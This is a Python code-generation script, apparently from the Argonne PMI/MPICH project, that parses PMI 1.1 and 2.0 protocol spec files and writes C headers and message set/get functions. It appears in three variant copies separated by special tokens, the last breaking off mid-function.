<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class G:
pmi_vers = []
cmd_list = []
cmd_hash = {}
class RE:
m = None
def match(pat, str, flags=0):
RE.m = re.match(pat, str, flags)
return RE.m
def search(pat, str, flags=0):
RE.m = re.search(pat, str, flags)
return RE.m
def main():
load_pmi_txt('maint/pmi-1.1.txt', '1.1')
load_pmi_txt('maint/pmi-2.0.txt', '2.0')
dump_all()
def load_pmi_txt(pmi_txt, ver):
cur_hash = {'version': ver}
G.pmi_vers.append(cur_hash)
prev_cmd = None
cur_cmd = None
cur_attrs = None
with open(pmi_txt, 'r') as In:
for line in In:
if RE.match('([A-Z]+):', line):
name = RE.m.group(1)
cur_cmd = {'version': ver}
cur_hash[name] = cur_cmd
if name not in G.cmd_hash:
G.cmd_list.append(name)
G.cmd_hash[name] = cur_cmd
prev_cmd = None
else:
prev_cmd = G.cmd_hash[name]
elif RE.match('\\s+([QR]):\\s*([\\w-]+)(.*)', line):
QR, cmd, tail = RE.m.group(1, 2, 3)
cur_attrs = []
if QR == 'Q':
cur_cmd['query-name'] = cmd
if RE.match('.*wire=.+', tail):
cur_cmd['query-attrs'] = []
else:
cur_cmd['query-attrs'] = cur_attrs
else:
cur_cmd['response-name'] = cmd
cur_cmd['response-attrs'] = cur_attrs
elif RE.match('\\s+([\\w-]+):\\s*([A-Z]+)(.*)', line):
name, kind, tail = RE.m.group(1, 2, 3)
cur_attrs.append([name, kind, tail])
elif RE.match('\\s+([\\[\\]])', line):
cur_attrs.append(RE.m.group(1))
def dump_all():
def dump_enums(Out):
print('enum PMIU_CMD_ID {', file=Out)
print(' PMIU_CMD_INVALID,', file=Out)
for NAME in G.cmd_list:
print(' PMIU_CMD_%s,' % NAME, file=Out)
print('};', file=Out)
print('', file=Out)
def dump_decls(Out):
std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'
std_response = (
'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'
)
std_get = 'struct PMIU_cmd *pmi'
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
decls = []
if 'query-name' in v0:
if len(v0['query-attrs']):
params = get_set_params(v0['query-attrs'])
decls.append('void PMIU_msg_set_query_%s(%s, %s);' % (
name, std_query, params))
params = get_get_params(v0['query-attrs'])
decls.append('int PMIU_msg_get_query_%s(%s, %s);' % (
name, std_get, params))
if 'response-name' in v0:
if len(v0['response-attrs']):
params = get_set_params(v0['response-attrs'])
decls.append('int PMIU_msg_set_response_%s(%s, %s);' %
(name, std_response, params))
params = get_get_params(v0['response-attrs'])
decls.append('int PMIU_msg_get_response_%s(%s, %s);' %
(name, std_get, params))
if len(decls):
print('/* PMIU_CMD_%s */' % NAME, file=Out)
for l in decls:
print(l, file=Out)
def dump_cmd_to_id(Out):
print('int PMIU_msg_cmd_to_id(const char *cmd)', file=Out)
print('{', file=Out)
t_if = ' if'
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and 'query-name' in v[NAME]:
t = v[NAME]['query-name']
if t not in prev:
cmp_list.append('strcmp(cmd, "%s") == 0' % t)
prev[t] = 1
if len(cmp_list):
print(t_if + ' (' + ' || '.join(cmp_list) + ') {', file=Out)
print(' return PMIU_CMD_%s;' % NAME, file=Out)
t_if = ' } else if'
print(' } else {', file=Out)
print(' return PMIU_CMD_INVALID;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_id_to_str(Out, query):
namekey = query + '-name'
print('const char *PMIU_msg_id_to_%s(int version, int cmd_id)' %
query, file=Out)
print('{', file=Out)
print(' switch(cmd_id) {', file=Out)
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and namekey in v[NAME]:
t = v[NAME][namekey]
if t not in prev:
cmp_list.append(t)
prev[t] = 1
if len(cmp_list) > 0:
print(' case PMIU_CMD_%s:' % NAME, file=Out)
if len(cmp_list) == 1:
print(' return "%s";' % cmp_list[0], file=Out)
else:
print(
' return (version == PMIU_WIRE_V1) ? "%s" : "%s";'
% (cmp_list[0], cmp_list[1]), file=Out)
print(' default:', file=Out)
print(' return NULL;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_id_to_response(Out):
print('const char *PMIU_msg_id_to_response(int version, int cmd_id)',
file=Out)
print('{', file=Out)
print(' switch(cmd_id) {', file=Out)
print(' default:', file=Out)
print(' return NULL;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_funcs(Out):
std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'
std_response = (
'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'
)
std_get = 'struct PMIU_cmd *pmi'
def dump_if_version(t_if, version, is_set, is_query):
if re.match('1\\.', version):
ver = 'PMIU_WIRE_V1'
else:
ver = 'PMIU_WIRE_V2'
if is_set:
if is_query:
print(t_if + ' (version == %s) {' % ver, file=Out)
else:
print(t_if + ' (pmi_query->version == %s) {' % ver,
file=Out)
else:
print(t_if + ' (pmi->version == %s) {' % ver, file=Out)
def dump_attrs(spaces, is_set, is_query, attrs, attrs0):
non_optional = 0
for i in range(len(attrs)):
a = attrs[i]
var = get_var(attrs0[i][0])
if is_query:
pmi = 'pmi_query'
else:
pmi = 'pmi_resp'
if a[1] == 'INTEGER':
kind = 'int'
elif a[1] == 'STRING':
kind = 'str'
elif a[1] == 'BOOLEAN':
kind = 'bool'
else:
raise Exception('Unhandled kind: ' + a[1])
if is_set:
pmiu = 'PMIU_cmd_add_' + kind
print(spaces + '%s(%s, "%s", %s);' % (pmiu, pmi, a[0],
var), file=Out)
elif RE.match('.*optional=(\\S+)', a[2]):
dflt = RE.m.group(1)
pmiu = 'PMIU_CMD_GET_%sVAL_WITH_DEFAULT' % kind.upper()
print(spaces + '%s(pmi, "%s", *%s, %s);' % (pmiu, a[0],
var, dflt), file=Out)
else:
pmiu = 'PMIU_CMD_GET_%sVAL' % kind.upper()
print(spaces + '%s(pmi, "%s", *%s);' % (pmiu, a[0], var
), file=Out)
non_optional += 1
return non_optional
def dump_it(NAME, v_list, is_set, is_query, attrs):
print('', file=Out)
ret_errno = True
if is_set:
params = get_set_params(attrs)
if is_query:
ret_errno = False
print('void PMIU_msg_set_query_%s(%s, %s)' % (name,
std_query, params), file=Out)
else:
print('int PMIU_msg_set_response_%s(%s, %s)' % (name,
std_response, params), file=Out)
else:
params = get_get_params(attrs)
if is_query:
print('int PMIU_msg_get_query_%s(%s, %s)' % (name,
std_get, params), file=Out)
else:
print('int PMIU_msg_get_response_%s(%s, %s)' % (name,
std_get, params), file=Out)
print('{', file=Out)
if ret_errno:
print(' int pmi_errno = PMIU_SUCCESS;', file=Out)
print('', file=Out)
if is_set:
if is_query:
print(
' PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);'
% NAME, file=Out)
else:
print(
' PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);' %
NAME, file=Out)
print(
' pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);'
, file=Out)
attrs_b = None
if len(v_list) > 1:
if is_query:
attrs_b = v_list[1]['query-attrs']
else:
attrs_b = v_list[1]['response-attrs']
non_optional = 0
if attrs_b is None or attrs_identical(attrs, attrs_b):
non_optional += dump_attrs(' ', is_set, is_query, attrs,
attrs)
else:
dump_if_version(' if', v_list[0]['version'], is_set,
is_query)
non_optional += dump_attrs(' ', is_set, is_query,
attrs, attrs)
dump_if_version(' } else if', v_list[1]['version'],
is_set, is_query)
non_optional += dump_attrs(' ', is_set, is_query,
attrs_b, attrs)
if ret_errno:
print(' } else {', file=Out)
print(
' PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, "invalid version");'
, file=Out)
non_optional += 1
print(' }', file=Out)
if non_optional > 0:
print('', file=Out)
print(' fn_exit:', file=Out)
print(' return pmi_errno;', file=Out)
print(' fn_fail:', file=Out)
print(' goto fn_exit;', file=Out)
elif ret_errno:
print('', file=Out)
print(' return pmi_errno;', file=Out)
print('}', file=Out)
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
if 'query-name' in v0:
if len(v0['query-attrs']):
dump_it(NAME, v_list, True, True, v0['query-attrs'])
dump_it(NAME, v_list, False, True, v0['query-attrs'])
if 'response-name' in v0:
if len(v0['response-attrs']):
dump_it(NAME, v_list, True, False, v0['response-attrs'])
dump_it(NAME, v_list, False, False, v0['response-attrs'])
msg_h = 'src/pmi_msg.h'
msg_c = 'src/pmi_msg.c'
with open(msg_h, 'w') as Out:
dump_copyright(Out)
INC = get_include_guard(msg_h)
print('#ifndef %s' % INC, file=Out)
print('#define %s' % INC, file=Out)
print('', file=Out)
dump_enums(Out)
print('', file=Out)
dump_decls(Out)
print('', file=Out)
print('#endif /* %s */' % INC, file=Out)
with open(msg_c, 'w') as Out:
dump_copyright(Out)
for inc in ['pmi_config', 'mpl', 'pmi_util', 'pmi_common',
'pmi_wire', 'pmi_msg']:
print('#include "%s.h"\n' % inc, file=Out)
dump_cmd_to_id(Out)
print('', file=Out)
dump_id_to_str(Out, 'query')
print('', file=Out)
dump_id_to_str(Out, 'response')
print('', file=Out)
dump_funcs(Out)
def get_set_params(attrs):
tlist = []
for a in attrs:
if len(a) == 3:
tlist.append(get_kind(a[1]) + get_var(a[0]))
return ', '.join(tlist)
def get_get_params(attrs):
tlist = []
for a in attrs:
if len(a) == 3:
tlist.append(get_kind(a[1]) + '*' + get_var(a[0]))
return ', '.join(tlist)
def get_var(name):
return name.replace('-', '_')
def get_kind(kind):
if kind == 'INTEGER':
return 'int '
elif kind == 'STRING':
return 'const char *'
elif kind == 'BOOLEAN':
return 'bool '
else:
raise Exception('unexpected kind ' + kind)
<|reserved_special_token_0|>
def dump_copyright(out):
print('/*', file=out)
print(' * Copyright (C) by Argonne National Laboratory', file=out)
print(' * See COPYRIGHT in top-level directory', file=out)
print(' */', file=out)
print('', file=out)
print('/* ** This file is auto-generated, do not edit ** */', file=out)
print('', file=out)
def get_include_guard(h_file):
h_file = re.sub('.*\\/', '', h_file)
h_file = re.sub('\\.', '_', h_file)
return h_file.upper() + '_INCLUDED'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import re
import os
class G:
pmi_vers = []
cmd_list = []
cmd_hash = {}
class RE:
m = None
def match(pat, str, flags=0):
RE.m = re.match(pat, str, flags)
return RE.m
def search(pat, str, flags=0):
RE.m = re.search(pat, str, flags)
return RE.m
def main():
load_pmi_txt('maint/pmi-1.1.txt', '1.1')
load_pmi_txt('maint/pmi-2.0.txt', '2.0')
dump_all()
def load_pmi_txt(pmi_txt, ver):
cur_hash = {'version': ver}
G.pmi_vers.append(cur_hash)
prev_cmd = None
cur_cmd = None
cur_attrs = None
with open(pmi_txt, 'r') as In:
for line in In:
if RE.match('([A-Z]+):', line):
name = RE.m.group(1)
cur_cmd = {'version': ver}
cur_hash[name] = cur_cmd
if name not in G.cmd_hash:
G.cmd_list.append(name)
G.cmd_hash[name] = cur_cmd
prev_cmd = None
else:
prev_cmd = G.cmd_hash[name]
elif RE.match('\\s+([QR]):\\s*([\\w-]+)(.*)', line):
QR, cmd, tail = RE.m.group(1, 2, 3)
cur_attrs = []
if QR == 'Q':
cur_cmd['query-name'] = cmd
if RE.match('.*wire=.+', tail):
cur_cmd['query-attrs'] = []
else:
cur_cmd['query-attrs'] = cur_attrs
else:
cur_cmd['response-name'] = cmd
cur_cmd['response-attrs'] = cur_attrs
elif RE.match('\\s+([\\w-]+):\\s*([A-Z]+)(.*)', line):
name, kind, tail = RE.m.group(1, 2, 3)
cur_attrs.append([name, kind, tail])
elif RE.match('\\s+([\\[\\]])', line):
cur_attrs.append(RE.m.group(1))
def dump_all():
def dump_enums(Out):
print('enum PMIU_CMD_ID {', file=Out)
print(' PMIU_CMD_INVALID,', file=Out)
for NAME in G.cmd_list:
print(' PMIU_CMD_%s,' % NAME, file=Out)
print('};', file=Out)
print('', file=Out)
def dump_decls(Out):
std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'
std_response = (
'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'
)
std_get = 'struct PMIU_cmd *pmi'
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
decls = []
if 'query-name' in v0:
if len(v0['query-attrs']):
params = get_set_params(v0['query-attrs'])
decls.append('void PMIU_msg_set_query_%s(%s, %s);' % (
name, std_query, params))
params = get_get_params(v0['query-attrs'])
decls.append('int PMIU_msg_get_query_%s(%s, %s);' % (
name, std_get, params))
if 'response-name' in v0:
if len(v0['response-attrs']):
params = get_set_params(v0['response-attrs'])
decls.append('int PMIU_msg_set_response_%s(%s, %s);' %
(name, std_response, params))
params = get_get_params(v0['response-attrs'])
decls.append('int PMIU_msg_get_response_%s(%s, %s);' %
(name, std_get, params))
if len(decls):
print('/* PMIU_CMD_%s */' % NAME, file=Out)
for l in decls:
print(l, file=Out)
def dump_cmd_to_id(Out):
print('int PMIU_msg_cmd_to_id(const char *cmd)', file=Out)
print('{', file=Out)
t_if = ' if'
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and 'query-name' in v[NAME]:
t = v[NAME]['query-name']
if t not in prev:
cmp_list.append('strcmp(cmd, "%s") == 0' % t)
prev[t] = 1
if len(cmp_list):
print(t_if + ' (' + ' || '.join(cmp_list) + ') {', file=Out)
print(' return PMIU_CMD_%s;' % NAME, file=Out)
t_if = ' } else if'
print(' } else {', file=Out)
print(' return PMIU_CMD_INVALID;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_id_to_str(Out, query):
namekey = query + '-name'
print('const char *PMIU_msg_id_to_%s(int version, int cmd_id)' %
query, file=Out)
print('{', file=Out)
print(' switch(cmd_id) {', file=Out)
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and namekey in v[NAME]:
t = v[NAME][namekey]
if t not in prev:
cmp_list.append(t)
prev[t] = 1
if len(cmp_list) > 0:
print(' case PMIU_CMD_%s:' % NAME, file=Out)
if len(cmp_list) == 1:
print(' return "%s";' % cmp_list[0], file=Out)
else:
print(
' return (version == PMIU_WIRE_V1) ? "%s" : "%s";'
% (cmp_list[0], cmp_list[1]), file=Out)
print(' default:', file=Out)
print(' return NULL;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_id_to_response(Out):
print('const char *PMIU_msg_id_to_response(int version, int cmd_id)',
file=Out)
print('{', file=Out)
print(' switch(cmd_id) {', file=Out)
print(' default:', file=Out)
print(' return NULL;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_funcs(Out):
std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'
std_response = (
'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'
)
std_get = 'struct PMIU_cmd *pmi'
def dump_if_version(t_if, version, is_set, is_query):
if re.match('1\\.', version):
ver = 'PMIU_WIRE_V1'
else:
ver = 'PMIU_WIRE_V2'
if is_set:
if is_query:
print(t_if + ' (version == %s) {' % ver, file=Out)
else:
print(t_if + ' (pmi_query->version == %s) {' % ver,
file=Out)
else:
print(t_if + ' (pmi->version == %s) {' % ver, file=Out)
def dump_attrs(spaces, is_set, is_query, attrs, attrs0):
non_optional = 0
for i in range(len(attrs)):
a = attrs[i]
var = get_var(attrs0[i][0])
if is_query:
pmi = 'pmi_query'
else:
pmi = 'pmi_resp'
if a[1] == 'INTEGER':
kind = 'int'
elif a[1] == 'STRING':
kind = 'str'
elif a[1] == 'BOOLEAN':
kind = 'bool'
else:
raise Exception('Unhandled kind: ' + a[1])
if is_set:
pmiu = 'PMIU_cmd_add_' + kind
print(spaces + '%s(%s, "%s", %s);' % (pmiu, pmi, a[0],
var), file=Out)
elif RE.match('.*optional=(\\S+)', a[2]):
dflt = RE.m.group(1)
pmiu = 'PMIU_CMD_GET_%sVAL_WITH_DEFAULT' % kind.upper()
print(spaces + '%s(pmi, "%s", *%s, %s);' % (pmiu, a[0],
var, dflt), file=Out)
else:
pmiu = 'PMIU_CMD_GET_%sVAL' % kind.upper()
print(spaces + '%s(pmi, "%s", *%s);' % (pmiu, a[0], var
), file=Out)
non_optional += 1
return non_optional
def dump_it(NAME, v_list, is_set, is_query, attrs):
print('', file=Out)
ret_errno = True
if is_set:
params = get_set_params(attrs)
if is_query:
ret_errno = False
print('void PMIU_msg_set_query_%s(%s, %s)' % (name,
std_query, params), file=Out)
else:
print('int PMIU_msg_set_response_%s(%s, %s)' % (name,
std_response, params), file=Out)
else:
params = get_get_params(attrs)
if is_query:
print('int PMIU_msg_get_query_%s(%s, %s)' % (name,
std_get, params), file=Out)
else:
print('int PMIU_msg_get_response_%s(%s, %s)' % (name,
std_get, params), file=Out)
print('{', file=Out)
if ret_errno:
print(' int pmi_errno = PMIU_SUCCESS;', file=Out)
print('', file=Out)
if is_set:
if is_query:
print(
' PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);'
% NAME, file=Out)
else:
print(
' PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);' %
NAME, file=Out)
print(
' pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);'
, file=Out)
attrs_b = None
if len(v_list) > 1:
if is_query:
attrs_b = v_list[1]['query-attrs']
else:
attrs_b = v_list[1]['response-attrs']
non_optional = 0
if attrs_b is None or attrs_identical(attrs, attrs_b):
non_optional += dump_attrs(' ', is_set, is_query, attrs,
attrs)
else:
dump_if_version(' if', v_list[0]['version'], is_set,
is_query)
non_optional += dump_attrs(' ', is_set, is_query,
attrs, attrs)
dump_if_version(' } else if', v_list[1]['version'],
is_set, is_query)
non_optional += dump_attrs(' ', is_set, is_query,
attrs_b, attrs)
if ret_errno:
print(' } else {', file=Out)
print(
' PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, "invalid version");'
, file=Out)
non_optional += 1
print(' }', file=Out)
if non_optional > 0:
print('', file=Out)
print(' fn_exit:', file=Out)
print(' return pmi_errno;', file=Out)
print(' fn_fail:', file=Out)
print(' goto fn_exit;', file=Out)
elif ret_errno:
print('', file=Out)
print(' return pmi_errno;', file=Out)
print('}', file=Out)
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
if 'query-name' in v0:
if len(v0['query-attrs']):
dump_it(NAME, v_list, True, True, v0['query-attrs'])
dump_it(NAME, v_list, False, True, v0['query-attrs'])
if 'response-name' in v0:
if len(v0['response-attrs']):
dump_it(NAME, v_list, True, False, v0['response-attrs'])
dump_it(NAME, v_list, False, False, v0['response-attrs'])
msg_h = 'src/pmi_msg.h'
msg_c = 'src/pmi_msg.c'
with open(msg_h, 'w') as Out:
dump_copyright(Out)
INC = get_include_guard(msg_h)
print('#ifndef %s' % INC, file=Out)
print('#define %s' % INC, file=Out)
print('', file=Out)
dump_enums(Out)
print('', file=Out)
dump_decls(Out)
print('', file=Out)
print('#endif /* %s */' % INC, file=Out)
with open(msg_c, 'w') as Out:
dump_copyright(Out)
for inc in ['pmi_config', 'mpl', 'pmi_util', 'pmi_common',
'pmi_wire', 'pmi_msg']:
print('#include "%s.h"\n' % inc, file=Out)
dump_cmd_to_id(Out)
print('', file=Out)
dump_id_to_str(Out, 'query')
print('', file=Out)
dump_id_to_str(Out, 'response')
print('', file=Out)
dump_funcs(Out)
def get_set_params(attrs):
tlist = []
for a in attrs:
if len(a) == 3:
tlist.append(get_kind(a[1]) + get_var(a[0]))
return ', '.join(tlist)
def get_get_params(attrs):
tlist = []
for a in attrs:
if len(a) == 3:
tlist.append(get_kind(a[1]) + '*' + get_var(a[0]))
return ', '.join(tlist)
def get_var(name):
return name.replace('-', '_')
def get_kind(kind):
if kind == 'INTEGER':
return 'int '
elif kind == 'STRING':
return 'const char *'
elif kind == 'BOOLEAN':
return 'bool '
else:
raise Exception('unexpected kind ' + kind)
def attrs_identical(attrs_a, attrs_b):
if len(attrs_a) != len(attrs_b):
return False
for i in range(len(attrs_a)):
a = attrs_a[i]
b = attrs_b[i]
if a[0] != b[0] or a[1] != b[1] or a[2] != b[2]:
return False
return True
def dump_copyright(out):
print('/*', file=out)
print(' * Copyright (C) by Argonne National Laboratory', file=out)
print(' * See COPYRIGHT in top-level directory', file=out)
print(' */', file=out)
print('', file=out)
print('/* ** This file is auto-generated, do not edit ** */', file=out)
print('', file=out)
def get_include_guard(h_file):
h_file = re.sub('.*\\/', '', h_file)
h_file = re.sub('\\.', '_', h_file)
return h_file.upper() + '_INCLUDED'
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
##
## Copyright (C) by Argonne National Laboratory
## See COPYRIGHT in top-level directory
##
import re
import os
class G:
pmi_vers = []
cmd_list = []
cmd_hash = {}
class RE:
m = None
def match(pat, str, flags=0):
RE.m = re.match(pat, str, flags)
return RE.m
def search(pat, str, flags=0):
RE.m = re.search(pat, str, flags)
return RE.m
def main():
# run from pmi top_srcdir
load_pmi_txt("maint/pmi-1.1.txt", "1.1")
load_pmi_txt("maint/pmi-2.0.txt", "2.0")
dump_all()
def load_pmi_txt(pmi_txt, ver):
cur_hash = {"version": ver}
G.pmi_vers.append(cur_hash)
prev_cmd = None
cur_cmd = None
cur_attrs = None
with open(pmi_txt, "r") as In:
for line in In:
if RE.match(r'([A-Z]+):', line):
name = RE.m.group(1)
cur_cmd = {"version": ver} # query-name, query-attrs, response-name, response-attrs
cur_hash[name] = cur_cmd
if name not in G.cmd_hash:
G.cmd_list.append(name)
G.cmd_hash[name] = cur_cmd
prev_cmd = None
else:
prev_cmd = G.cmd_hash[name]
elif RE.match(r'\s+([QR]):\s*([\w-]+)(.*)', line):
QR, cmd, tail = RE.m.group(1, 2, 3)
cur_attrs = []
if QR == "Q":
cur_cmd["query-name"] = cmd
if RE.match(r'.*wire=.+', tail):
# spawn - we'll manually code it
cur_cmd["query-attrs"] = []
else:
cur_cmd["query-attrs"] = cur_attrs
else:
cur_cmd["response-name"] = cmd
cur_cmd["response-attrs"] = cur_attrs
elif RE.match(r'\s+([\w-]+):\s*([A-Z]+)(.*)', line):
name, kind, tail = RE.m.group(1, 2, 3)
cur_attrs.append([name, kind, tail])
elif RE.match(r'\s+([\[\]])', line):
cur_attrs.append(RE.m.group(1))
def dump_all():
def dump_enums(Out):
print("enum PMIU_CMD_ID {", file=Out)
print(" PMIU_CMD_INVALID,", file=Out)
for NAME in G.cmd_list:
print(" PMIU_CMD_%s," % NAME, file=Out)
print("};", file=Out)
print("", file=Out)
def dump_decls(Out):
std_query="struct PMIU_cmd *pmi_query, int version, bool is_static"
std_response="struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static"
std_get="struct PMIU_cmd *pmi"
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
decls = []
if "query-name" in v0:
if len(v0["query-attrs"]):
params = get_set_params(v0["query-attrs"])
decls.append("void PMIU_msg_set_query_%s(%s, %s);" % (name, std_query, params))
params = get_get_params(v0["query-attrs"])
decls.append("int PMIU_msg_get_query_%s(%s, %s);" % (name, std_get, params))
if "response-name" in v0:
if len(v0["response-attrs"]):
params = get_set_params(v0["response-attrs"])
decls.append("int PMIU_msg_set_response_%s(%s, %s);" % (name, std_response, params))
params = get_get_params(v0["response-attrs"])
decls.append("int PMIU_msg_get_response_%s(%s, %s);" % (name, std_get, params))
if len(decls):
print("/* PMIU_CMD_%s */" % NAME, file=Out)
for l in decls:
print(l, file=Out)
def dump_cmd_to_id(Out):
print("int PMIU_msg_cmd_to_id(const char *cmd)", file=Out)
print("{", file=Out)
t_if = " if"
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and "query-name" in v[NAME]:
t = v[NAME]["query-name"]
if t not in prev:
cmp_list.append("strcmp(cmd, \"%s\") == 0" % t)
prev[t] = 1
if len(cmp_list):
print(t_if + " (" + ' || '.join(cmp_list) + ") {", file=Out)
print(" return PMIU_CMD_%s;" % NAME, file=Out)
t_if = " } else if"
print(" } else {", file=Out)
print(" return PMIU_CMD_INVALID;", file=Out)
print(" }", file=Out)
print("}", file=Out)
def dump_id_to_str(Out, query):
namekey = query + "-name"
print("const char *PMIU_msg_id_to_%s(int version, int cmd_id)" % query, file=Out)
print("{", file=Out)
print(" switch(cmd_id) {", file=Out)
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and namekey in v[NAME]:
t = v[NAME][namekey]
if t not in prev:
cmp_list.append(t)
prev[t] = 1
if len(cmp_list) > 0:
print(" case PMIU_CMD_%s:" % NAME, file=Out)
if len(cmp_list) == 1:
print(" return \"%s\";" % cmp_list[0], file=Out)
else:
print(" return (version == PMIU_WIRE_V1) ? \"%s\" : \"%s\";" % (cmp_list[0], cmp_list[1]), file=Out)
print(" default:", file=Out)
print(" return NULL;", file=Out)
print(" }", file=Out)
print("}", file=Out)
def dump_id_to_response(Out):
print("const char *PMIU_msg_id_to_response(int version, int cmd_id)", file=Out)
print("{", file=Out)
print(" switch(cmd_id) {", file=Out)
print(" default:", file=Out)
print(" return NULL;", file=Out)
print(" }", file=Out)
print("}", file=Out)
def dump_funcs(Out):
std_query="struct PMIU_cmd *pmi_query, int version, bool is_static"
std_response="struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static"
std_get="struct PMIU_cmd *pmi"
def dump_if_version(t_if, version, is_set, is_query):
if re.match(r"1\.", version):
ver = "PMIU_WIRE_V1"
else:
ver = "PMIU_WIRE_V2"
if is_set:
if is_query:
print(t_if + " (version == %s) {" % ver, file=Out)
else:
print(t_if + " (pmi_query->version == %s) {" % ver, file=Out)
else:
print(t_if + " (pmi->version == %s) {" % ver, file=Out)
def dump_attrs(spaces, is_set, is_query, attrs, attrs0):
non_optional = 0
for i in range(len(attrs)):
a = attrs[i]
var = get_var(attrs0[i][0])
if is_query:
pmi = "pmi_query"
else:
pmi = "pmi_resp"
if a[1] == "INTEGER":
kind = "int"
elif a[1] == "STRING":
kind = "str"
elif a[1] == "BOOLEAN":
kind = "bool"
else:
raise Exception("Unhandled kind: " + a[1])
if is_set:
pmiu = "PMIU_cmd_add_" + kind
print(spaces + "%s(%s, \"%s\", %s);" % (pmiu, pmi, a[0], var), file=Out)
else:
if RE.match(r'.*optional=(\S+)', a[2]):
dflt = RE.m.group(1)
pmiu = "PMIU_CMD_GET_%sVAL_WITH_DEFAULT" % kind.upper()
print(spaces + "%s(pmi, \"%s\", *%s, %s);" % (pmiu, a[0], var, dflt), file=Out)
else:
pmiu = "PMIU_CMD_GET_%sVAL" % kind.upper()
print(spaces + "%s(pmi, \"%s\", *%s);" % (pmiu, a[0], var), file=Out)
non_optional += 1
return non_optional
def dump_it(NAME, v_list, is_set, is_query, attrs):
print("", file=Out)
ret_errno = True
if is_set:
params = get_set_params(attrs)
if is_query:
ret_errno = False
print("void PMIU_msg_set_query_%s(%s, %s)" % (name, std_query, params), file=Out)
else:
print("int PMIU_msg_set_response_%s(%s, %s)" % (name, std_response, params), file=Out)
else:
params = get_get_params(attrs)
if is_query:
print("int PMIU_msg_get_query_%s(%s, %s)" % (name, std_get, params), file=Out)
else:
print("int PMIU_msg_get_response_%s(%s, %s)" % (name, std_get, params), file=Out)
print("{", file=Out)
if ret_errno:
print(" int pmi_errno = PMIU_SUCCESS;", file=Out)
print("", file=Out)
if is_set:
if is_query:
print(" PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);" % NAME, file=Out)
else:
print(" PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);" % NAME, file=Out)
print(" pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);", file=Out)
attrs_b = None
if len(v_list) > 1:
if is_query:
attrs_b = v_list[1]["query-attrs"]
else:
attrs_b = v_list[1]["response-attrs"]
non_optional = 0
if attrs_b is None or attrs_identical(attrs, attrs_b):
non_optional += dump_attrs(" ", is_set, is_query, attrs, attrs)
else:
dump_if_version(" if", v_list[0]["version"], is_set, is_query)
non_optional += dump_attrs(" ", is_set, is_query, attrs, attrs)
dump_if_version(" } else if", v_list[1]["version"], is_set, is_query)
non_optional += dump_attrs(" ", is_set, is_query, attrs_b, attrs)
if ret_errno:
print(" } else {", file=Out)
print(" PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, \"invalid version\");", file=Out)
non_optional += 1
print(" }", file=Out)
if non_optional > 0:
print("", file=Out)
print(" fn_exit:", file=Out)
print(" return pmi_errno;", file=Out)
print(" fn_fail:", file=Out)
print(" goto fn_exit;", file=Out)
elif ret_errno:
print("", file=Out)
print(" return pmi_errno;", file=Out)
print("}", file=Out)
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
if "query-name" in v0:
if len(v0["query-attrs"]):
dump_it(NAME, v_list, True, True, v0["query-attrs"])
dump_it(NAME, v_list, False, True, v0["query-attrs"])
if "response-name" in v0:
if len(v0["response-attrs"]):
dump_it(NAME, v_list, True, False, v0["response-attrs"])
dump_it(NAME, v_list, False, False, v0["response-attrs"])
# ----------------------
msg_h = "src/pmi_msg.h"
msg_c = "src/pmi_msg.c"
with open(msg_h, "w") as Out:
dump_copyright(Out)
INC = get_include_guard(msg_h)
